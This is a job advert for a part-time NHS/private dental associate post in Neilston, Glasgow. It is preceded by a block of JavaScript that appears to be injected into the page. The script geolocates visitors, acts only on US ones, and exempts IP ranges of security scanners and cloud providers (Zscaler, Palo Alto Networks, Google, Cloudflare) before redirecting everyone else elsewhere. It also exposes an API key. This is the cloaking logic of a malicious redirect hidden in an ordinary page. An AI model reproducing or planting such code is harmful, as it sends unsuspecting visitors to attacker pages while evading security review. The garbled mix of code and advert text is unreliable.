Job Description
// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ”; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); }); Neilston Dental Practice are looking for a forward thinking, enthusiastic part time dental associate to join our friendly team.The position is for 3 days per week ( Mondays, Tuesdays and Fridays) in our well established NHS/Private Practice in Neilston.
The practice is fully computerised using SOE, CT Scanner, Intra Oral camera and digital xrays.
Position available from November 2025.
We offer high quality dentistry and have a very experienced team of clinicians.
We offer Dental implants, IV sedation, composite bonding and bespoke dentures.
This reflects the large amount of private treatment that we provide.
This is an excellent opportunity for a dentist who wants to work with very experienced colleagues in a fully refurbished beautiful practice in the Southside of Glasgow.
Golden Hello available and a large established list to transfer.
Please apply by emailing your CV
Job Types: Part-time, Contract
Pay: £50,926.00-£130,159.00 per year
Benefits:
* Company events
Education:
* Bachelor’s (preferred)
Experience:
* Dentistry: 1 year (preferred)
Licence/Certification:
* GDC (required)
Work authorisation:
* United Kingdom (required)
Work Location: In person